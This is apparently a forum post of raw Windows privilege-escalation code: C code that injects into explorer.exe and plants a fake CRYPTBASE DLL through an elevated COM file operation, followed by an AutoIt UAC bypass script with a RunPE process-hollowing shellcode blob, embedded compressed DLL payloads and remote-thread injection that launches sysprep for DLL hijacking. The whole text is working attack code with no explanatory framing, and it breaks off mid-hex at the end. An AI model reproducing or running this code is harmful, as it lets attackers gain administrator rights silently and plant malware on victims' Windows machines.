    wcscpy(ia.szEIFOMoniker,    L"Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}");

    memcpy(&ia.pIID_EIFO,        &__uuidof(IFileOperation), sizeof(GUID));
    memcpy(&ia.pIID_ShellItem2,  &__uuidof(IShellItem2), sizeof(GUID));
    memcpy(&ia.pIID_Unknown,     &__uuidof(IUnknown), sizeof(GUID));

    if (!bInject)
    {
        Status = RemoteCodeFunc(&ia);
    }
    else
    {

        void * RemoteArgs = VirtualAllocEx(TargetProcess, 0, sizeof(ia), MEM_COMMIT, PAGE_READWRITE);
        if (!RemoteArgs || !WriteProcessMemory(TargetProcess, RemoteArgs, &ia, sizeof(ia), NULL))
            return 0;

        void * RemoteCode = VirtualAllocEx(TargetProcess, 0, codeEndAdr - codeStartAdr, MEM_COMMIT, PAGE_EXECUTE_READ);
        if (!RemoteCode || !WriteProcessMemory(TargetProcess, RemoteCode, RemoteCodeFunc, codeEndAdr - codeStartAdr, NULL))
            return 0;

        HANDLE hRemoteThread = CreateRemoteThread(TargetProcess, NULL, 0, (LPTHREAD_START_ROUTINE)RemoteCode, RemoteArgs, 0, NULL);
        if (!hRemoteThread)
            return 0;

        DWORD dwWaitRes = WaitForSingleObject(hRemoteThread, 40000);

        if (dwWaitRes == WAIT_OBJECT_0)
            GetExitCodeThread(hRemoteThread, (DWORD *)&Status);

        CloseHandle(hRemoteThread);
    }

    return Status;
}

int UACBypass()
{
    DWORD Processes[1024], BytesReturned;

    if (!EnumProcesses(Processes, sizeof(Processes), &BytesReturned))
        return 0;
   
    HANDLE TargetProcess = NULL;

    for (unsigned i = 0; i < BytesReturned / 4; i++)
    {
        if (Processes[i] != 0)
        {
            TargetProcess = OpenProcess(/*PROCESS_QUERY_INFORMATION | PROCESS_VM_READ*/PROCESS_ALL_ACCESS, FALSE, Processes[i]);

            if (TargetProcess)
            {
                HMODULE hMod;
                DWORD cbNeeded;
       
                if (EnumProcessModules(TargetProcess, &hMod, sizeof(hMod),  &cbNeeded) )
                {
                    wchar_t ProcessName[MAX_PATH];
                    GetModuleBaseName(TargetProcess, hMod, ProcessName,   sizeof(ProcessName)/sizeof(TCHAR) );
                   
                    if (_wcsicmp(ProcessName, L"explorer.exe") == 0)
                        break;
                }

                CloseHandle(TargetProcess);
                TargetProcess = NULL;
            }
        }
    }

    if (!TargetProcess)
        return 0;

    wchar_t SelfFileName[MAX_PATH];
    if (!GetModuleFileNameW(NULL, SelfFileName, MAX_PATH))
    {
        CloseHandle(TargetProcess);
        return 0;
    }

    wchar_t FakeCrytbase[MAX_PATH];
    GetTempPathW(MAX_PATH, FakeCrytbase);
    GetTempFileNameW(FakeCrytbase, L"tmp", 0, FakeCrytbase);
    if (!CopyFile(SelfFileName, FakeCrytbase, 0))
    {
        CloseHandle(TargetProcess);
        return 0;
    }

    HANDLE FakeFile = CreateFileW(FakeCrytbase, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (FakeFile == INVALID_HANDLE_VALUE)
    {
        CloseHandle(TargetProcess);
        return 0;
    }

    DWORD NumberOfBytesRead;
    BYTE ImageHeader[4096];
    if (!ReadFile(FakeFile, ImageHeader, 4096, &NumberOfBytesRead, NULL))
    {
        CloseHandle(TargetProcess);
        CloseHandle(FakeFile);
        return 0;
    }

    PIMAGE_DOS_HEADER dos_header = (PIMAGE_DOS_HEADER)ImageHeader;
    PIMAGE_NT_HEADERS old_header = (PIMAGE_NT_HEADERS)&((const unsigned char *)(ImageHeader))[dos_header->e_lfanew];

    old_header->FileHeader.Characteristics |= IMAGE_FILE_DLL;

    DWORD NumberOfBytesWritten;
    if (SetFilePointer(FakeFile, 0, NULL, FILE_BEGIN) == INVALID_SET_FILE_POINTER ||
        !WriteFile(FakeFile, ImageHeader, 4096, &NumberOfBytesWritten, NULL))
    {
        CloseHandle(TargetProcess);
        CloseHandle(FakeFile);
        return 0;
    }

    CloseHandle(FakeFile);

    NTSTATUS Status = AttemptOperation(1, TargetProcess, FakeCrytbase);

    CloseHandle(TargetProcess);
    DeleteFile(FakeCrytbase);
   
    if (Status)
        ExitProcess(1);

    return 1;
}
Код:
#include <WinApi.au3>
#include <Memory.au3>


;Code By Pink|Danyfirex|Dany 28/03/2014
;UAC ByPass
;32-bit Only


Global $_LZF_CodeBuffer, $_LZF_CodeBufferMemory, $_LZF_Compress, $_LZF_Decompress


Local $sProcessName = "Explorer.exe"
Local $sysprepPath = @SystemDir & "\sysprep\sysprep.exe"
Local $sCrypbase = @SystemDir & "\sysprep\CRYPTBASE.dll"
Local $ExplorerPath = @WindowsDir & "\" & $sProcessName
Local $TempCRYPTBASE = @TempDir & "\CRYPTBASE.dll"


If Not (@Compiled) Then Exit

If @OSArch = "X86" Then

    If IsAdmin() Then
        If FileExists($sCrypbase) Then FileDelete($sCrypbase)
        MsgBox(0, "Pink", "Hola Soy Admin :)")
        Exit
    Else
        MsgBox(0, "Pink", "No soy Admin :(")
        If FileExists($sCrypbase) Then FileDelete($sCrypbase)
        UACbyPass()
        If FileExists($TempCRYPTBASE) Then FileDelete($TempCRYPTBASE)
    EndIf

    Exit

EndIf



Func UACbyPass()
    WriteDllTemp()
    FileData()
    RunPE($ExplorerPath, FileData())

    Sleep(2000)

    Local $hProcess = _WinAPI_OpenProcess(BitOR($PROCESS_CREATE_THREAD, $PROCESS_VM_OPERATION, $PROCESS_VM_WRITE), False, ProcessExists($sProcessName))

    Local $iRet = RemoteShellExecuteEx($hProcess, $sysprepPath, @ScriptFullPath)

    Return $iRet
EndFunc   ;==>UACbyPass

Func RunPE($path, $filebin)


    Local $ASM = "0x60E84E0000006B00650072006E0065006C003300320000006E00740064006C006C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005B8BFC6A42E8BB0300008B54242889118B54242C6A3EE8AA03000089116A4AE8A103000089396A1E6A3CE89D0300006A2268F4000000E8910300006A266A24E8880300006A2A6A40E87F030000"
    $ASM &= "6A2E6A0CE8760300006A3268C8000000E86A0300006A2AE85C0300008B09C701440000006A12E84D030000685BE814CF51E8790300006A3EE83B0300008BD16A1EE8320300006A40FF32FF31FFD06A12E823030000685BE814CF51E84F0300006A1EE8110300008B098B513C6A3EE8050300008B3903FA6A22E8FA0200008B0968F80000005751FFD06A00E8E80200006888FEB31651E8140300006A2EE8D60200"
    $ASM &= "008B396A2AE8CD0200008B116A42E8C402000057526A006A006A046A006A006A006A00FF31FFD06A12E8A902000068D03710F251E8D50200006A22E8970200008B116A2EE88E0200008B09FF7234FF31FFD06A00E87E020000689C951A6E51E8AA0200006A22E86C0200008B118B396A2EE8610200008B096A406800300000FF7250FF7734FF31FFD06A36E8470200008BD16A22E83E0200008B396A3EE8350200"
    $ASM &= "008B316A22E82C0200008B016A2EE8230200008B0952FF775456FF7034FF316A00E81002000068A16A3DD851E83C02000083C40CFFD06A12E8F9010000685BE814CF51E8250200006A22E8E70100008B1183C2066A3AE8DB0100006A025251FFD06A36E8CE010000C70100000000B8280000006A36E8BC010000F7216A1EE8B30100008B118B523C81C2F800000003D06A3EE89F01000003116A26E8960100006A"
    $ASM &= "2852FF316A12E88A010000685BE814CF51E8B601000083C40CFFD06A26E8730100008B398B098B71146A3EE86501000003316A26E85C0100008B098B510C6A22E8500100008B090351346A46E8440100008BC16A2EE83B0100008B0950FF77105652FF316A00E82A01000068A16A3DD851E85601000083C40CFFD06A36E8130100008B1183C20189116A3AE8050100008B093BCA0F8533FFFFFF6A32E8F4000000"
    $ASM &= "8B09C701070001006A00E8E500000068D2C7A76851E8110100006A32E8D30000008B116A2EE8CA0000008B0952FF7104FFD06A22E8BB0000008B3983C7346A32E8AF0000008B318BB6A400000083C6086A2EE89D0000008B116A46E894000000516A045756FF326A00E88600000068A16A3DD851E8B200000083C40CFFD06A22E86F0000008B098B51280351346A32E8600000008B0981C1B000000089116A00E8"
    $ASM &= "4F00000068D3C7A7E851E87B0000006A32E83D0000008BD16A2EE8340000008B09FF32FF7104FFD06A00E82400000068883F4A9E51E8500000006A2EE8120000008B09FF7104FFD06A4AE8040000008B2161C38BCB034C2404C36A00E8F2FFFFFF6854CAAF9151E81E0000006A406800100000FF7424186A00FFD0FF742414E8CFFFFFFF890183C410C3E82200000068A44E0EEC50E84B00000083C408FF742404"
    $ASM &= "FFD0FF74240850E83800000083C408C355525153565733C0648B70308B760C8B761C8B6E088B7E208B3638471875F3803F6B7407803F4B7402EBE78BC55F5E5B595A5DC35552515356578B6C241C85ED74438B453C8B54287803D58B4A188B5A2003DDE330498B348B03F533FF33C0FCAC84C07407C1CF0D03F8EBF43B7C242075E18B5A2403DD668B0C4B8B5A1C03DD8B048B03C55F5E5B595A5DC3C300000000"



    Local $BufferASM = DllStructCreate("byte[" & BinaryLen($ASM) & "]")
    Local $binBuffer = DllStructCreate("byte[" & BinaryLen($filebin) & "]")


    DllStructSetData($BufferASM, 1, $ASM)
    DllStructSetData($binBuffer, 1, $filebin)




    Local $Ret = DllCall("user32.dll", "int", "CallWindowProcW", _
            "ptr", DllStructGetPtr($BufferASM), _
            "wstr", ($Path), _
            "ptr", DllStructGetPtr($binBuffer), _
            "int", 0, _
            "int", 0)

EndFunc   ;==>RunPE





Func RemoteShellExecuteEx($hProcess, $sFile, $sParameters, $sVerb = "OPEN", $hWnd = 0)


    Local Const $SEE_MASK_INVOKEIDLIST = 0xC
    Local Const $SEE_MASK_NOCLOSEPROCESS = 0x40
    Local Const $SEE_MASK_FLAG_NO_UI = 0x400

    Local $Databuffer = 0, $FileBuff = 0, $SHELLEXECUTEINFO = 0, $sSHELLEXECUTEINFO = "", $sfiles = "", $written = 0

    $sfiles = "wchar modulename[12];char function[16];wchar sverb[256];wchar file[256];wchar Parameters[256];"
    $sSHELLEXECUTEINFO = "int cbSize;long fMask;hwnd hWnd;ptr lpVerb;ptr lpFile;ptr lpParameters;ptr lpDirectory;" & _
            "int nShow;int hInstApp;ptr lpIDList;ptr lpClass;hwnd hkeyClass;int dwHotKey;hwnd hIcon;" & _
            "hwnd hProcess"

    $Databuffer = DllStructCreate($sfiles & $sSHELLEXECUTEINFO)

    DllStructSetData($Databuffer, "sverb", $sVerb)
    DllStructSetData($Databuffer, "file", $sFile)
    DllStructSetData($Databuffer, "Parameters", $sParameters)
    DllStructSetData($Databuffer, "modulename", "Shell32.dll") ;Libreria
    DllStructSetData($Databuffer, "function", "ShellExecuteExW") ; Funcion
    DllStructSetData($Databuffer, "cbSize", 60) ;Tamaño Structura 60
    DllStructSetData($Databuffer, "fMask", $SEE_MASK_INVOKEIDLIST)
    DllStructSetData($Databuffer, "hwnd", $hWnd)



    $pRemoteData = _MemVirtualAllocEx($hProcess, 0, sizeof($Databuffer), $MEM_COMMIT, $PAGE_READWRITE)
    If Not $pRemoteData Then Return MsgBox(16, "Epic Failure", "Failed to allocate memory in process!")


    $Loadlibrary = DllCall("Kernel32.dll", "ptr", "GetProcAddress", "ptr", _WinAPI_GetModuleHandle("Kernel32.dll"), "str", "LoadLibraryW")
    $Loadlibrary = $Loadlibrary[0]

    $GetProcAddress = DllCall("Kernel32.dll", "ptr", "GetProcAddress", "ptr", _WinAPI_GetModuleHandle("Kernel32.dll"), "str", "GetProcAddress")
    $GetProcAddress = $GetProcAddress[0]

    $CodeBuffer = DllStructCreate("byte[33]")

    $pRemoteCode = _MemVirtualAllocEx($hProcess, 0, sizeof($CodeBuffer), $MEM_COMMIT, $PAGE_EXECUTE_READWRITE)


    ;Punteros a cadenas
    DllStructSetData($Databuffer, "lpVerb", $pRemoteData + (_ptr($Databuffer, "sverb") - _ptr($Databuffer)))
    DllStructSetData($Databuffer, "lpFile", $pRemoteData + (_ptr($Databuffer, "file") - _ptr($Databuffer)))
    DllStructSetData($Databuffer, "lpParameters", $pRemoteData + (_ptr($Databuffer, "Parameters") - _ptr($Databuffer)))



    DllStructSetData($CodeBuffer, 1, _
            "0x" & _
            "68" & SwapEndian($pRemoteData + (_ptr($Databuffer, "modulename") - _ptr($Databuffer))) & _  ; push RemoteData.modulename
            "B8" & SwapEndian($Loadlibrary) & _                                                         ; mov eax,LoadLibrary
            "FFD0" & _                                                                                  ; call eax
            "68" & SwapEndian($pRemoteData + (_ptr($Databuffer, "function") - _ptr($Databuffer))) & _   ; push RemoteData.function ShellExecuteExW
            "50" & _                                                                                    ; push eax
            "B8" & SwapEndian($GetProcAddress) & _                                                      ; mov eax,GetProcAddress
            "FFD0" & _                                                                                  ; call eax
            "68" & SwapEndian($pRemoteData + (_ptr($Databuffer, "cbSize") - _ptr($Databuffer))) & _         ; push Puntero SHELLEXECUTEINFO
            "FFD0" & _                                                                                  ; call eax
            "C3") ; Ret




    _WinAPI_WriteProcessMemory($hProcess, $pRemoteCode, _ptr($CodeBuffer), sizeof($CodeBuffer), $written)
    _WinAPI_WriteProcessMemory($hProcess, $pRemoteData, _ptr($Databuffer), sizeof($Databuffer), $written)

    $iThread = DllCall("Kernel32.dll", "int", "CreateRemoteThread", "ptr", $hProcess, "ptr", 0, "int", 0, "ptr", $pRemoteCode, "ptr", 0, "int", 0, "dword*", 0)
    $hThread = $iThread[0]


    _WinAPI_WaitForSingleObject($hThread)

    _MemVirtualFreeEx($hProcess, $pRemoteCode, 0, $MEM_RELEASE)
    _MemVirtualFreeEx($hProcess, $pRemoteData, 0, $MEM_RELEASE)


    $iThread = DllCall("Kernel32.dll", "ptr", "GetExitCodeThread", "ptr", $hThread, "dword*", 0)
    Return $iThread[2]
EndFunc   ;==>RemoteShellExecuteEx


Func sizeof($s)
    Return DllStructGetSize($s)
EndFunc   ;==>sizeof

Func _ptr($s, $e = "")
    If $e <> "" Then Return DllStructGetPtr($s, $e)
    Return DllStructGetPtr($s)
EndFunc   ;==>_ptr

Func SwapEndian($hex)
    Return Hex(BitOR(BitOR(BitOR(BitShift($hex, 24), _
            BitAND(BitShift($hex, -8), 0x00FF0000)), _
            BitAND(BitShift($hex, 8), 0x0000FF00)), _
            BitShift($hex, -24)), 8)
EndFunc   ;==>SwapEndian




;ASM
Func FileData()
    Local $Decompressed = ""
    Local $sDll = '0x000C0000104D5A80000100000004001000FFFF000040400C200000402003E01700008020201F0E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F17742062652072756E20696E20444F53206D6F64652E0D0A24203A60000B504500004C010300C57635536010200009E0000F010B0101460002200C00082003400000102004400300202007409D400B201FA0AE20BFA00040B8201701198260068027402BE00029A00EC0000330000042C044E06200042E74657874206F00ED2003609F20B36003E0020020EA05602E646174612013012405200420100100062003E000EC800020F202C02E69802860CB20D3604B000A2007E0020020272002E0050005C70500204000418E02C705142009405A096A00FF15E830400068222010016804211D02FF158C400F014E24200F401402FF1590400F401A02682A22400F0094400F003A401F800F601F012025202F000060044049006A201E02FF15EC40290032200A0168102019006AC050011C3120110036E00216804760160414040401A1404C06508B00FF50146A203501FF35402B01FF354048E0011A0040E0010A0054E0010A0008202E0115882076E0FF00E0FF00E0FF00E0FF00E0FF00E01C00045C0073007920030470007200652005005C2035164300520059005000540042004100530045002E0064006C20010000200B006C20270C76006100740069006F006E003A20230264006D200D006E2003007320170072601D006F200700212013026500772023027B00332015006426D40035200100372003022D00382001400B022D003460090030200902390032201D40130031200100626017006220374009006520210239007D20851F7555D03A57885048927711B85BDB8E095FAB7A945C0A134CB4D64BF7836FC9F80F1E6D824318E7EE42BC55A1E261C37BFE2032E0D4000074482BA0000050200B0088200300DC2003C000005E200B00E82003011431C01127F2200F001CE0020FE00300104B45524E454C33322E444C4C00004F4C45A00A035348454CC016009C203F00AA200300BA200300C620034000E00B1322330978697450726F63657373200D0B47657454656D705061746857200E07006C737472636174600B201B1153797374656D4469726563746F72795700F4205B0004A0A7E0030B22A70A6F496E697469616C697A65200E200F203F024F626A2039200D0024A033C007000020BD064372656174654920600D46726F6D50617273696E674E616D603EE0B000010000'
    $Decompressed = _LZF_Decompress($sDll)
    Return $Decompressed
EndFunc   ;==>FileData

;Dll
Func WriteDllTemp()
    Local $sTempPath = @TempDir
    Local $Decompressed = ""
    Local $sDll = '0x001E0000084D5A90000300000004200304FFFF0000B82007400000404004E016000080201F1F0E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F18742062652072756E20696E20444F53206D6F64652E0D0D0A24203B40000B504500004C010600FABF3453400F400009E0000E210B010232000C200D000E20034000001020044003003020074009400B000280B7400040BF600000702005A00C40D7402A602B4004200A40004006001020470046200C000420E80050200740040098A037E0040003600000C8E00410E01D0000C02057006CE0122A012E632108201F00B02003609020CBC0B7C0000020207D042E746578742010014A082004201001000A200300062003E00200201609602E7264617461000056401720DB604F40E8E00200209201402E8026010014411C2010607300122007E00200201605C02E72737263201361134120407300162010E00200202705402E72656C6F20286123212B6077001C2007E0020020270042E0020EE0FF00E07C0011837C240801750E8B442404A3D8420010E82220964014010275600604007505E838A01204037500B801200B03C20C0068200620042260600906E8BB0F0000A3D4403F00EB222401E8F1200E01E818202202C3E811200502E82617245D0035601F0097201A04C3C38B15E8202C035252FF354007804300AC204D018B15222D0A10011424E8471500008F05E0011D006520370231C0C3204DE0FF00E03C0001FF2524A90310FF25D8600500DC600500E0600500E4400505742404FF35EC21AA0DE8CE05000085C07417FF30FF15E8E0051A00D8201A03C204006A40010210E85524290A681E2000106A046A04A3F0403B00F220200168F4200900A3404A02FF15EC203F09C3558BEC51535657FF356022001820350A834DFCFF8BF833F6FF15F020201F8A0884C974758B550880F92075064080382074FA8A0833DB4380F9227523408A02088BF020200016200D017407200D1184C975F480380074058BD040EB218BD0EB1D201D02178BF0203DE0031F1C8BD07404EBDE33DB8B0F3B4DFC75078B4D0885C9751A85DB7403FF45FC205E00F62047028E837D22F713138B45FCEB1485F6740D2BD68911FF078BC6EB06202E068321005F5E5BC920EF40C080BD058365FC00E85620E4201F0585C97802890820D8068D45FC50E817FF200009750C8B75FC568BD8E84F20E406568BF85357E8B720090583C40CC60437804D0008604D03568B35F420F9016A02414A403F04FFD650FF3740040115F82017005E217F000D200F617F209D0B8907C9C3558D6C249C81ECC4220C20731033DB6A445E5633FF8D45DC534750C74560261A1B00895D58895D50895D44895D5C895D48895D54895D40895D4CC7453047600D895D34897D38E8F3FDFFFF8A4D7820940C8975DC'
    $sDll &= '897D08F6C102740B33C020430028204309EB028BC76689450CBE0024000EF6C140741D8B457C3BC374168B400C2006040FC7450801201919894514897D4CEB39F6C1047438F6C1107433538D4530508D45502003005820C600FC20C620C5091C8B45580975088D7D50203101E801212302C7454C203F1300836560F78B457883E00489453C7472F6457808E00043005C20430044E00443005C60430844894518E8BDFEFFFF403CA04720380020E00038005420380048E0043800546038054889451CE884E0053813857508742A8B3500410010395D1475076AF6FFD620A302395D18200B00F5400B0318395D1C200B00F4400B0C1C8B7D6C3BFB750AC7456C06302193097D6C395D707507C74570400E0257E8D6285106FF75708BF0E8CC20090759598D4406045053850902FF1504206409803F2289457C7423BE04203F035650E8AA20270557FF757CE8A7200800564008009E20080883C418EB095750E88C200B0959598B7570381E74196827E700104021007C2015602A007320080183C4221A007421930A0738187503895D748D452020FF0CDC50FF757453FF7560FF754C532007047C53FF1508207F0485C00F848E2178018B3543D40C395D5C7405FF755CFFD6395D58400900584009005440090754FFD6FF7524FFD621590301740B6A22D50320FF150C204105395D3C7445BF43DD0357FF15102010036A2868E023EB01E87428D2075959578BF0FF151420161E8B452089068B45288946048B454489460C8B45508946088B4548894610E92A21FD405200D66009018B3DE0048D03D7395D444083004440090050400900504009A0A1201DA0A120090048401D0248FFD720A603780F85E520D90A395D74753B8B756C56E84828F30D8D7430FF8B456C593BF07626803E20ED044E3BF077F6200D00182120027CE82B2022022B756C22DC1D5959885C06018945746A3C5E568D45A05350E8D0FAFFFF0FB7450C8945BC2162028945B82048088945B08B45708945B42338202507508975A0C745A440218802C745AC420402FF152420FC22F3005C2092A13900D8E10139003AE10B39003A210CE1043914D8834E04FF8906895E0C895E08895E10897540EB0C404703D7C74540202C213A21D0676002FF1518206F028B454024A50583C564C9C21445960100B8408B01505025D00514E8C8FBFFFF24BF27F3130885C078118B4C24043B41087D068B490C8B048120AA0707833800750233C0249640244020202800204024061B8B510C8D048220200A741CFF316A00FF30E8B9F9237A0AC40CEB0C5083C11051E8AA208E015959203A0356578B3D42E2036A206A08A09B02D78BF02050040C83661000220B05442414894614200600102213220A03C1E00250E0012A2221035F8BC65E286C2021000420AF005620BC0008E0001F633D28A8201E08F074'
    $sDll &= '0656FF54241059802EE0092620D2001340C4078B1185D2740789422008078910890183C008C3205B60DF0583E8088B103929090289118B25C30A741783610400EB118B4804A01007068B50048951045020F2E1026746C5006A290328BA20180015474505A30C430010C768B921090300C70510200F400A00A14008203F018B0D4021005180C100A348EF025DC3CCC000265400A14012E0032761D0001540340252FF1547A2E0052F0383EC08A14927070345088945F88B0D40660C83E904394DF87C338B55F881C2204F02008915401660820583C005508B0D2014011051208CC057001C2235608C607E000342E508FC8B4D0C034D08890D405D266F028BE55D21D602FF25C4203A02FF25C8600500CC600500D0200520EBE0FF00E0A20048204BF2E00300CF8B00422E47445CC0030038200F003C200300402003007721EF004B2007140000546573742E646C6C004D7946756E6374696F6E2015E0FF00E09B000054241FC0000136412FFC200F006C2003C0000080201324D90100B82003C00000C62FD126D8E00C00002C2017008E20030098200300A2200300AC200340000042200700502003005E2003006C200300B6200300C4200300E0200300F22003000620530018200300262003003620030042200300542003006A200300822003009A200300A62003400000B4A007E0636B0699026D656D7365318E054D535643525462F50B00A40248656170437265617431D000A5600D004423131F726F790005014578697450726F6365737300F7014765744D6F64756C6548616E02646C6520F3074B45524E454C3332804B01C1022037056E63707900BE4009016C65234A00BA400940120100B660090061207F054400436C6F73A0450E00B902496E697469616C697A65437220090463616C536583890070407303436F6D6D2070024C696E207200AA601104757272656EE0009905D5004475706C20370074C05301920080D10250697020D5013E0220B90253746480B621D560E502416C6C31FA0095C02980E520D3116E0457616974466F7253696E676C654F626A208C0700DA00456E746572E007A00600F4024C656176E008B80100A6606302467265206F00A9600B01526580712CEA1268656C6C45786563757465457841005348454C414402444C4C201DE0FF00E01F00C5EF53BC25D64613008051BC33CE55E2E0021F000120012607E00A1700092AF1542600A0200400944024E00200E0015F803F0078E00E3F009020330434520000632C38C00002940134200A04560053005F20050245005220090449004F004E200F004920050046200B400003BD04EFFE405F40008005E00107E00F0000F220180001204F087400720069006E0067204D006935B500652059046E0066006F201F00CE200300012D68C00102340062200B20A7358802010043'
    $sDll &= '2023006D36720061202F0079208D0061200D22AE200000502049026E006B214B00532023006620634137000C20330050206D066F0064007500632015E003330054203B00732013004C203B006220250061200323F603004A00132037004C201D00672013006C60750070201940B500672A7C405B00412017006C206D0052203B8013400B404F006520270076200500642049443940CF005620470072E00AED25D376100054201D40D3007320530061205F006920B1239260000BB0043C3F786D6C207665727327EB083D22312E302220656E36D023EE0A3D225554462D3822207374247117616C6F6E653D22796573223F3E0A3C617373656D626C7920203F1F6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A6173056D2E7631222024B6016966254C0056E0036C033E0A2020E0004B01496424C70269747920130020E004934001002260153890457F076F72417263686974248C017572209502583836801F026E616D200E25240470616E794E200C002E24CB0364756374600B06596F7572417070802A02747970202A0777696E333222202F6088066465736372697048F7023E3C2FE0030D207C201D0270656E20A2016379400EE00210017441A10C80172019C11DE004D14000E003742053800080B4004DC135082E57696E646F77732E20C6066D6F6E2D436F6E2681016C73E00130E100AF00364119C11B4000E1171F400002707562261F064B6579546F6B6521F40F36353935623634313434636366316466E00167066C616E677561672126002AA12220DB002FC107E004F6E00116411E020A3C2FC102003E6269E0FF00E0540025F045EB0C0C304C306C307930813091309F44E02C185A9B1F023008300E3014301A30243035303F30573060306A306F3075308330963041311F9031A831B5316F32B332EC3217334933583376337C338933BC33FC330A343E341F48344F345634663498345D3563357835823589359035A035CD35D335E9355F361F69369436B436BA36DB36E13635373B374E375337593763376C3775377C3781371F94379D37A437AA37B137C737D337EA37EF37F937023809380E38133825383438043A384038462690E0FF00E02500010000'

    $Decompressed = _LZF_Decompress($sDll)
    FileWrite($sTempPath & "\CRYPTBASE.dll", $Decompressed)
EndFunc   ;==>WriteDllTemp





;By Ward
Func _LZF_Exit()
    $_LZF_CodeBuffer = 0
    _MemVirtualFree($_LZF_CodeBufferMemory, 0, $MEM_RELEASE)
EndFunc   ;==>_LZF_Exit

Func _LZF_Startup()
    If Not IsDllStruct($_LZF_CodeBuffer) Then
        If @AutoItX64 Then
            Local $Opcode = '0x89C04883EC38488B41084C894C2420488B094589C14989C0E81E0000004883C438C389DB4883EC084589C14C8B4108488B094883C408E94404000041574156415541544589CC4F8D2420555756534883EC184585C9488BB424800000000F841602000085D20F840E02000089D20FB6014D8D48014C8D3C110FB651014531DB418D5FFE498D6FFEC1E00809C2895C240C4889C8EB28EB01904D39E10F83D80100000FB6184183C3014883C0014188194983C1014183FB200F84710200004839E80F834E01000089D30FB650024C8D5002C1E30809DA8D3C9289D3C1EB0829FB81E3FFFF0000488D1CDE488B3B488903488D58FF4829FB4881FBFF1F000077994839F94C8D680473904D39FD738B440FB73766443B307581440FB67702453A320F8573FFFFFF498D51044939D40F8635010000448B54240CBA08010000458D73FF4129C24181FA08010000440F47D24489DAF7D24863D24588341131D24585DB0F94C24929D14183FA100F86FE010000440FB67703BA0200000041BB20000000443A70030F84030100004883C0014889DF48C1EF084101FB4588194983C1014801D04188194983C1024839E80F839F0100000FB658FE0FB650FF4C8D50FE498D7A01C1E30809DA0FB618C1E20809DA448D1C9289D3C1E208C1EB084429DB4531DB81E3FFFF00004C8914DE0FB65F0209DA89D3448D1492C1EB084429D381E3FFFF00004839E848893CDE0F82B7FEFFFFEB03909090498D51034939D4725C4C39F8732390900FB6104183C3014883C0014188114983C1014183FB200F84FF0000004939C777DF4489D8418D53FFF7D048984188140131C04585DB0F94C04929C14489C84429C0EB144585DB750D498D51034939D40F87B9FEFFFF31C04883C4185B5E5F5D415C415D415E415FC3440FB67704B20341BB40000000453A75000F85E6FEFFFF440FB66F05B20441BB60000000443A68050F85CFFEFFFF440FB66F06B20541BB80FFFFFF443A68060F85B8FEFFFF440FB66F07B20641BBA0FFFFFF443A68070F85A1FEFFFF440FB66F08B20741BBC0FFFFFF443A68080F858AFEFFFF0FB657093A50097450BA0800000031FF4883C0014989DA4188790149C1EA084183EA204588114983C102E970FEFFFF41C641DF1F4530DB4983C101E97EFDFFFF41C641DF1F4530DB4983C101E9F0FEFFFF4531DBE9BCFEFFFF0FB6570A3A500A7442BA09000000BF01000000EBA2BA0200000083C2014139D2760E4189D3460FB62C1F463A2C1874EA448D52FE4883C0014183FA06763D418D7AF9418D5201E970FFFFFF0FB6570B3A500B740FBA0A000000BF02000000E954FFFFFF0FB6570C3A500C7421BA0B000000BF03000000E93CFFFFFF4489D2C1E2054189D3418D5201E9A8FDFFFF0FB6570D3A500D740FBA0C000000BF04000000E912FFFFFF0FB6'
            $Opcode &= '570E3A500E740FBA0D000000BF05000000E9FAFEFFFF0FB6570F3A500F740FBA0E000000BF06000000E9E2FEFFFF0FB657103A5010740FBA0F000000BF07000000E9CAFEFFFF0FB657113A5011740FBA10000000BF08000000E9B2FEFFFF0FB657123A5012740FBA11000000BF09000000E99AFEFFFFBA12000000E9F3FEFFFF5789D24589C94989CA488D14114F8D0C08564C89C74883EC08EB2EEB008D4E0189C8488D34074939F10F8293000000498D04024839C20F82860000004C89D6F3A44989F24939D27357410FB6324983C20183FE1F76C74C39D2766789F1C1E90583F907744889C8450FB61A488D4407024939C1724D48C1E608450FB6DB81E6001F000048F7D6488D34374C29DE4939F077304983C20183C102F3A44939D272A989F84883C4085E4429C05FC390410FB60A4983C2014C39D276080FB6C983C107EBA34883C40831C05E5FC3'
        Else
            Local $Opcode = '0x89C083EC2C8B54243C8B442430895424108B5424388954240C8B5004895424088B542434895424048B00890424E83600000083C42CC2100089DB83EC1C8B4424208B5424288954240C8B5004895424088B542424895424048B00890424E86A04000083C41CC210005557565383EC208B4424408B4C243C8B54243801C185C0894C24100F841B02000085D20F84130200008B5C243431F6035424348B44243C8954241C0FB6138B7C241C0FB64B0183C001C1E20883EF0209D189DA897C240CEB213B4424100F83D90100000FB61A83C60183C201881883C00183FE200F84220200003B54240C0F835A0100008D6A0289CB896C24180FB64A02C1E30809D989CBC1EB088D3C8929FB8B7C244481E3FFFF00008D1C9F8B3B89138D5AFF29FB81FBFF1F0000895C24087797397C24348D6A04896C2414738A8B5C241C39DD73820FB71F663B1A0F8576FFFFFF8B6C24180FB65F023A5D000F8565FFFFFF8D4804394C24100F862A0100008B4C241C29D183E90281F9080100000F873001000089F385F6F7D3895C24188B6C24188D5EFF881C280F94C389DE81E6FF00000029F083F9100F86940100000FB66F03BE02000000C64424182089EB3A5A030F84F700000083C2018B4C2408C1E908024C2418880883C0010FB64C240801F2880883C0023B54240C0F830A0200000FB65AFE8D72FF0FB64AFF8D7AFEC1E30809D90FB61AC1E10809D989CB8D2C89C1EB0829EB8B6C244481E3FFFF0000C1E108897C9D000FB65E0209D989CBC1EB088D3C8929FB81E3FFFF000089749D0031F63B54240C0F82A6FEFFFF8D4803394C241072553B54241C731F8B5C241C0FB60A83C60183C201880883C00183FE200F84A300000039D377E589F2F7D28D4EFF880C1031D285F60F94C229D02B44243C83C4205B5E5F5DC385F6750D8D4803394C24100F87C5FEFFFF83C42031C05B5E5F5DC3B908010000E9C6FEFFFF8B6C241466BE0300C6442418400FB65F043A5D000F85EFFEFFFF0FB66F0566BE0400C64424186089EB3A5A050F85D7FEFFFF0FB6770689F33A5A06742DBE05000000C644241880E9BDFEFFFFC640DF1F6631F683C001E9CFFDFFFFC640DF1F6631F683C001E94EFFFFFF0FB6770789F33A5A077470BE06000000C6442418A0E985FEFFF